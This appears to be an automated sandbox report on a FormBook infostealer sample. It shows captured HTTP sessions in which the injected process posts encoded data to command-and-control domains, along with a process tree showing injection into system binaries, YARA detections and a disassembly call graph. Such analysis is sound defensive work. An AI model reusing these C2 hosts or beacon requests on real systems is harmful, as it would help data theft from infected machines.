                            46          192.168.2.4  49783        3.33.130.190    80                1668  C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp                             Bytes transferred  Direction  Data
                            Jul 16, 2024 07:24:41.226093054 CEST  654  OUT  POST /0x0m/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.lmsforsme.com
                            Origin: http://www.lmsforsme.com
                            Referer: http://www.lmsforsme.com/0x0m/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=VUvN4rU/1iY3Zd7woZ0cjkKISuomkZS4ZgkQYmuyELqaOSrAoHtxMOOdi5/OHLZujXP9vAlx4UqUX98w4uqtvmEsscRGMDfn3FI5rzsIrGDRa+9zC4vbD7awVbXrsz/1apMZ4ZAhtwT1Xy/4izT0/bdrSDWsNeC3JN0RFNe+sCr42Uqtvzrkm4Jwo+fknihDucBZfHftWJzgXB281Si+m0o=


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                            47          192.168.2.4  49784        3.33.130.190    80                1668  C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp                             Bytes transferred  Direction  Data
                            Jul 16, 2024 07:24:43.766119003 CEST  10736  OUT  POST /0x0m/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.lmsforsme.com
                            Origin: http://www.lmsforsme.com
                            Referer: http://www.lmsforsme.com/0x0m/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                            48          192.168.2.4  49785        3.33.130.190    80                1668  C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp                             Bytes transferred  Direction  Data
                            Jul 16, 2024 07:24:46.292792082 CEST  367  OUT  GET /0x0m/?UbV=YWHt7d8s1wtxEc6N7JBdk3GvQZUe6qigJh5gb0SeLYvcAy/h2X15EObbup3pZ5JIlELN4AUs60aWctEAjqiruE1aq+9hFwKJnnwArXASsnPjRvxDOp7wEtw=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.lmsforsme.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:24:46.751651049 CEST  395  IN  HTTP/1.1 200 OK
                            Server: openresty
                            Date: Tue, 16 Jul 2024 05:24:46 GMT
                            Content-Type: text/html
                            Content-Length: 255
                            Connection: close
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UbV=YWHt7d8s1wtxEc6N7JBdk3GvQZUe6qigJh5gb0SeLYvcAy/h2X15EObbup3pZ5JIlELN4AUs60aWctEAjqiruE1aq+9hFwKJnnwArXASsnPjRvxDOp7wEtw=&Y4gp=mlltcrRxcL"}</script></head></html>


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                            49          192.168.2.4  49786        23.105.215.248  80                1668  C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp                             Bytes transferred  Direction  Data
                            Jul 16, 2024 07:24:52.193397999 CEST  640  OUT  POST /fl6s/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.3333711m14.shop
                            Origin: http://www.3333711m14.shop
                            Referer: http://www.3333711m14.shop/fl6s/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=N2Zl4HZTNvSQKUHMjg4c/GMhtGzKku+qooGB40yVfJ7UWruWUYHWPns5Q81V2QSl566DLAOKMrJ9DLBbdWjB2h94RHwWEr3hrOOW/jUi1+bgvbA4MdrV1YynUNf5ofbXVuudhs7CInJ6CLbKyto49NICnVGVWLB8KGFY5qbBmpW4hdY5WTToRoosZZU9m6fD+Q==
                            Jul 16, 2024 07:24:52.797907114 CEST  691  IN  HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:24:52 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session ID: 50 | Source IP: 192.168.2.4 | Source Port: 49787 | Destination IP: 23.105.215.248 | Destination Port: 80 | PID: 1668 | Process: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp: Jul 16, 2024 07:24:54.731209040 CEST | Bytes transferred: 660 | Direction: OUT | Data: POST /fl6s/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.3333711m14.shop
                            Origin: http://www.3333711m14.shop
                            Referer: http://www.3333711m14.shop/fl6s/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=N2Zl4HZTNvSQL0XMmCQc4mMu02zK9e+mooKB4xTIe/DUT7eWVavWKns5JM1QyQSY56/gLBCKMrd9DJZbenjOwx96enwUbb3hrOOW/jQY1+TgvoI4O8rUpIykD9f5sfbbVuu0hpavIlh6CKrKy50/ndIAp1HyZpUREGUXzbv4trDUkbJjHiy/DoMfEedJr5iKlbmozgDNqLNan4Zp5jvVmgo=
                            Timestamp: Jul 16, 2024 07:24:55.313714027 CEST | Bytes transferred: 691 | Direction: IN | Data: HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:24:55 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session ID: 51 | Source IP: 192.168.2.4 | Source Port: 49788 | Destination IP: 23.105.215.248 | Destination Port: 80 | PID: 1668 | Process: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp: Jul 16, 2024 07:24:57.267774105 CEST | Bytes transferred: 10742 | Direction: OUT | Data: POST /fl6s/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.3333711m14.shop
                            Origin: http://www.3333711m14.shop
                            Referer: http://www.3333711m14.shop/fl6s/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV= [TRUNCATED]
                            Timestamp: Jul 16, 2024 07:24:57.936101913 CEST | Bytes transferred: 691 | Direction: IN | Data: HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:24:57 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session ID: 52 | Source IP: 192.168.2.4 | Source Port: 49789 | Destination IP: 23.105.215.248 | Destination Port: 80 | PID: 1668 | Process: C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp: Jul 16, 2024 07:24:59.798352003 CEST | Bytes transferred: 369 | Direction: OUT | Data: GET /fl6s/?UbV=A0xF7xRkJcHWMje5ph9HwG4I+mL/4fGguKCb0ROeX6+MB4i3E47mIUkdVM9rjjeu+d+SM2PwCOtJO5VtZmrS2xNTeXttUbHK0PGy4AIus9DMh4I9KsOxy7U=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.3333711m14.shop
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Timestamp: Jul 16, 2024 07:25:00.368628025 CEST | Bytes transferred: 691 | Direction: IN | Data: HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:25:00 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session ID: 53 | Source IP: 192.168.2.4 | Source Port: 49790 | Destination IP: 3.33.130.190 | Destination Port: 80
                            Timestamp: Jul 16, 2024 07:25:05.837614059 CEST | Bytes transferred: 646 | Direction: OUT | Data: POST /nbaz/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.iitaccounting.com
                            Origin: http://www.iitaccounting.com
                            Referer: http://www.iitaccounting.com/nbaz/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=FwmcXhAyedZzR1/LVx8KYNHPlYVldl0pf3BdL/6EiLrJpF1fvGzcZLWMMao5KbpZDTPh4hG0ayMGnq9hBS4Gc9G1O9OQ8lTw4ksU+uBbt5a7dwlx/rT1toZ/F146EehGPmE9PxbtddL5T55WT/irLe5neYjvsnxUBPN6WDHays14rl3mOa0BcXWadpf+8Mg+JQ==


                            Target ID:0
                            Start time:01:20:57
                            Start date:16/07/2024
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"
                            Imagebase:0x880000
                            File size:1'179'136 bytes
                            MD5 hash:13C0E83573FFFEB4E951929815DAF4E1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:01:20:58
                            Start date:16/07/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe"
                            Imagebase:0xf40000
                            File size:46'504 bytes
                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:moderate
                            Has exited:true

                            Target ID:5
                            Start time:01:21:23
                            Start date:16/07/2024
                            Path:C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe"
                            Imagebase:0x2b0000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            Target ID:6
                            Start time:01:21:25
                            Start date:16/07/2024
                            Path:C:\Windows\SysWOW64\makecab.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\makecab.exe"
                            Imagebase:0x400000
                            File size:68'096 bytes
                            MD5 hash:00824484BE0BCE2A430D7F43CD9BABA5
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            Reputation:low
                            Has exited:false

                            Target ID:7
                            Start time:01:21:38
                            Start date:16/07/2024
                            Path:C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe"
                            Imagebase:0x2b0000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            Target ID:8
                            Start time:01:21:50
                            Start date:16/07/2024
                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                            Imagebase:0x7ff6bf500000
                            File size:676'768 bytes
                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                              Execution Graph

                              Execution Coverage:3.9%
                              Dynamic/Decrypted Code Coverage:1.5%
                              Signature Coverage:2.9%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:160
99288 883778 99236->99288 99238 883b8c IsDebuggerPresent 99239 883b9a 99238->99239 99240 8bd4ad MessageBoxA 99238->99240 99242 8bd4c7 99239->99242 99243 883bb7 99239->99243 99272 883c73 99239->99272 99240->99242 99241 883c7a SetCurrentDirectoryW 99244 883c87 Mailbox 99241->99244 99488 887373 59 API calls Mailbox 99242->99488 99369 8873e5 99243->99369 99244->99155 99247 8bd4d7 99252 8bd4ed SetCurrentDirectoryW 99247->99252 99249 883bd5 GetFullPathNameW 99250 887d2c 59 API calls 99249->99250 99251 883c10 99250->99251 99385 890a8d 99251->99385 99252->99244 99255 883c2e 99256 883c38 99255->99256 99489 8e4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 99255->99489 99401 883a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 99256->99401 99259 8bd50a 99259->99256 99272->99241 99285->99224 99286->99229 99287->99231 99289 8877c7 59 API calls 99288->99289 99290 88378e 99289->99290 99499 883d43 99290->99499 99292 8837ac 99293 884864 61 API calls 99292->99293 99294 8837c0 99293->99294 99295 887f41 59 API calls 99294->99295 99296 8837cd 99295->99296 99513 884f3d 99296->99513 99299 8bd3ae 99584 8e97e5 99299->99584 99300 8837ee Mailbox 99537 8881a7 99300->99537 99303 8bd3cd 99306 8a2f95 _free 58 API calls 99303->99306 99308 8bd3da 99306->99308 99310 884faa 84 API calls 99308->99310 99312 8bd3e3 99310->99312 99316 883ee2 59 API calls 99312->99316 99313 887f41 59 API calls 99314 88381a 99313->99314 99544 888620 99314->99544 99318 8bd3fe 99316->99318 99317 88382c Mailbox 99319 887f41 59 API calls 99317->99319 99320 883ee2 59 API calls 99318->99320 99321 883852 99319->99321 99322 8bd41a 99320->99322 99323 888620 69 API calls 99321->99323 99324 884864 61 API calls 99322->99324 99326 883861 Mailbox 99323->99326 99325 8bd43f 99324->99325 99327 883ee2 59 API calls 99325->99327 99329 8877c7 59 API calls 99326->99329 99328 8bd44b 99327->99328 99330 8881a7 59 API calls 99328->99330 99331 88387f 99329->99331 99332 8bd459 99330->99332 99548 883ee2 99331->99548 99335 
883ee2 59 API calls 99332->99335 99336 8bd468 99335->99336 99342 8881a7 59 API calls 99336->99342 99338 883899 99338->99312 99339 8838a3 99338->99339 99340 8a313d _W_store_winword 60 API calls 99339->99340 99341 8838ae 99340->99341 99341->99318 99343 8838b8 99341->99343 99344 8bd48a 99342->99344 99345 8a313d _W_store_winword 60 API calls 99343->99345 99346 883ee2 59 API calls 99344->99346 99347 8838c3 99345->99347 99348 8bd497 99346->99348 99347->99322 99349 8838cd 99347->99349 99348->99348 99350 8a313d _W_store_winword 60 API calls 99349->99350 99351 8838d8 99350->99351 99351->99336 99352 883919 99351->99352 99354 883ee2 59 API calls 99351->99354 99352->99336 99353 883926 99352->99353 99564 88942e 99353->99564 99356 8838fc 99354->99356 99357 8881a7 59 API calls 99356->99357 99359 88390a 99357->99359 99361 883ee2 59 API calls 99359->99361 99361->99352 99364 8893ea 59 API calls 99366 883961 99364->99366 99365 889040 60 API calls 99365->99366 99366->99364 99366->99365 99367 8839a7 Mailbox 99366->99367 99368 883ee2 59 API calls 99366->99368 99367->99238 99368->99366 99370 8873f2 __ftell_nolock 99369->99370 99371 8bee4b _memset 99370->99371 99372 88740b 99370->99372 99375 8bee67 GetOpenFileNameW 99371->99375 99373 8848ae 60 API calls 99372->99373 99374 887414 99373->99374 100374 8a09d5 99374->100374 99377 8beeb6 99375->99377 99378 887d2c 59 API calls 99377->99378 99380 8beecb 99378->99380 99380->99380 99382 887429 100392 8869ca 99382->100392 99386 890a9a __ftell_nolock 99385->99386 100697 886ee0 99386->100697 99388 890a9f 99389 883c26 99388->99389 100708 8912fe 89 API calls 99388->100708 99389->99247 99389->99255 99391 890aac 99391->99389 100709 894047 91 API calls Mailbox 99391->100709 99393 890ab5 99393->99389 99394 890ab9 GetFullPathNameW 99393->99394 99488->99247 99489->99259 99500 883d50 __ftell_nolock 99499->99500 99501 887d2c 59 API calls 99500->99501 99505 883eb6 Mailbox 99500->99505 99502 883d82 99501->99502 99511 883db8 Mailbox 99502->99511 99625 887b52 
99502->99625 99504 883e89 99504->99505 99506 887f41 59 API calls 99504->99506 99505->99292 99507 883eaa 99506->99507 99509 883f84 59 API calls 99507->99509 99508 887f41 59 API calls 99508->99511 99509->99505 99510 883f84 59 API calls 99510->99511 99511->99504 99511->99505 99511->99508 99511->99510 99512 887b52 59 API calls 99511->99512 99512->99511 99628 884d13 99513->99628 99518 884f68 LoadLibraryExW 99638 884cc8 99518->99638 99519 8bdd0f 99521 884faa 84 API calls 99519->99521 99523 8bdd16 99521->99523 99525 884cc8 3 API calls 99523->99525 99526 8bdd1e 99525->99526 99664 88506b 99526->99664 99527 884f8f 99527->99526 99528 884f9b 99527->99528 99530 884faa 84 API calls 99528->99530 99532 8837e6 99530->99532 99532->99299 99532->99300 99534 8bdd45 99672 885027 99534->99672 99536 8bdd52 99538 883801 99537->99538 99539 8881b2 99537->99539 99541 8893ea 99538->99541 100099 8880d7 99539->100099 99542 8a0ff6 Mailbox 59 API calls 99541->99542 99543 88380d 99542->99543 99543->99313 99545 88862b 99544->99545 99547 888652 99545->99547 100103 888b13 69 API calls Mailbox 99545->100103 99547->99317 99549 883eec 99548->99549 99550 883f05 99548->99550 99551 8881a7 59 API calls 99549->99551 99552 887d2c 59 API calls 99550->99552 99553 88388b 99551->99553 99552->99553 99554 8a313d 99553->99554 99555 8a3149 99554->99555 99556 8a31be 99554->99556 99558 8a316e 99555->99558 100104 8a8d68 58 API calls __getptd_noexit 99555->100104 100106 8a31d0 60 API calls 3 library calls 99556->100106 99558->99338 99560 8a31cb 99560->99338 99561 8a3155 100105 8a8ff6 9 API calls __mbstowcs_l_helper 99561->100105 99563 8a3160 99563->99338 99565 889436 99564->99565 99566 8a0ff6 Mailbox 59 API calls 99565->99566 99567 889444 99566->99567 99568 883936 99567->99568 100107 88935c 59 API calls Mailbox 99567->100107 99570 8891b0 99568->99570 100108 8892c0 99570->100108 99572 8a0ff6 Mailbox 59 API calls 99574 883944 99572->99574 99573 8891bf 99573->99572 99573->99574 99575 889040 99574->99575 99576 8bf5a5 
99575->99576 99577 889057 99575->99577 99576->99577 100123 888d3b 59 API calls Mailbox 99576->100123 99579 88915f 99577->99579 99580 889158 99577->99580 99581 8891a0 99577->99581 99579->99366 99583 8a0ff6 Mailbox 59 API calls 99580->99583 100122 889e9c 60 API calls Mailbox 99581->100122 99583->99579 99585 885045 85 API calls 99584->99585 99586 8e9854 99585->99586 100124 8e99be 99586->100124 99589 88506b 74 API calls 99590 8e9881 99589->99590 99591 88506b 74 API calls 99590->99591 99592 8e9891 99591->99592 99593 88506b 74 API calls 99592->99593 99594 8e98ac 99593->99594 99595 88506b 74 API calls 99594->99595 99596 8e98c7 99595->99596 99597 885045 85 API calls 99596->99597 99598 8e98de 99597->99598 99599 8a594c _W_store_winword 58 API calls 99598->99599 99600 8e98e5 99599->99600 99601 8a594c _W_store_winword 58 API calls 99600->99601 99602 8e98ef 99601->99602 99603 88506b 74 API calls 99602->99603 99604 8e9903 99603->99604 99605 8e9393 GetSystemTimeAsFileTime 99604->99605 99606 8e9916 99605->99606 99607 8e992b 99606->99607 99608 8e9940 99606->99608 99611 8a2f95 _free 58 API calls 99607->99611 99609 8e9946 99608->99609 99610 8e99a5 99608->99610 100130 8e8d90 99609->100130 99613 8a2f95 _free 58 API calls 99610->99613 99614 8e9931 99611->99614 99616 8bd3c1 99613->99616 99617 8a2f95 _free 58 API calls 99614->99617 99616->99303 99619 884faa 99616->99619 99617->99616 99618 8a2f95 _free 58 API calls 99618->99616 99620 884fb4 99619->99620 99622 884fbb 99619->99622 99621 8a55d6 __fcloseall 83 API calls 99620->99621 99621->99622 99623 884fca 99622->99623 99624 884fdb FreeLibrary 99622->99624 99623->99303 99624->99623 99626 887faf 59 API calls 99625->99626 99627 887b5d 99626->99627 99627->99502 99677 884d61 99628->99677 99631 884d3a 99633 884d4a FreeLibrary 99631->99633 99634 884d53 99631->99634 99632 884d61 2 API calls 99632->99631 99633->99634 99635 8a548b 99634->99635 99681 8a54a0 99635->99681 99637 884f5c 99637->99518 99637->99519 99839 884d94 99638->99839 99641 884ced 
99643 884d08 99641->99643 99644 884cff FreeLibrary 99641->99644 99642 884d94 2 API calls 99642->99641 99645 884dd0 99643->99645 99644->99643 99646 8a0ff6 Mailbox 59 API calls 99645->99646 99647 884de5 99646->99647 99648 88538e 59 API calls 99647->99648 99649 884df1 _memmove 99648->99649 99650 884e2c 99649->99650 99651 884ee9 99649->99651 99652 884f21 99649->99652 99653 885027 69 API calls 99650->99653 99843 884fe9 CreateStreamOnHGlobal 99651->99843 99854 8e9ba5 95 API calls 99652->99854 99657 884e35 99653->99657 99656 88506b 74 API calls 99656->99657 99657->99656 99659 884ec9 99657->99659 99660 8bdcd0 99657->99660 99849 885045 99657->99849 99659->99527 99661 885045 85 API calls 99660->99661 99662 8bdce4 99661->99662 99663 88506b 74 API calls 99662->99663 99663->99659 99665 88507d 99664->99665 99666 8bddf6 99664->99666 99878 8a5812 99665->99878 99669 8e9393 100076 8e91e9 99669->100076 99671 8e93a9 99671->99534 99673 8bddb9 99672->99673 99674 885036 99672->99674 100081 8a5e90 99674->100081 99676 88503e 99676->99536 99678 884d2e 99677->99678 99679 884d6a LoadLibraryA 99677->99679 99678->99631 99678->99632 99679->99678 99680 884d7b GetProcAddress 99679->99680 99680->99678 99684 8a54ac __setmode 99681->99684 99682 8a54bf 99730 8a8d68 58 API calls __getptd_noexit 99682->99730 99684->99682 99686 8a54f0 99684->99686 99685 8a54c4 99731 8a8ff6 9 API calls __mbstowcs_l_helper 99685->99731 99700 8b0738 99686->99700 99689 8a54f5 99690 8a550b 99689->99690 99691 8a54fe 99689->99691 99693 8a5535 99690->99693 99694 8a5515 99690->99694 99732 8a8d68 58 API calls __getptd_noexit 99691->99732 99715 8b0857 99693->99715 99733 8a8d68 58 API calls __getptd_noexit 99694->99733 99695 8a54cf @_EH4_CallFilterFunc@8 __setmode 99695->99637 99701 8b0744 __setmode 99700->99701 99702 8a9e4b __lock 58 API calls 99701->99702 99713 8b0752 99702->99713 99703 8b07c6 99735 8b084e 99703->99735 99704 8b07cd 99740 8a8a5d 58 API calls 2 library calls 99704->99740 99707 8b0843 __setmode 99707->99689 99708 
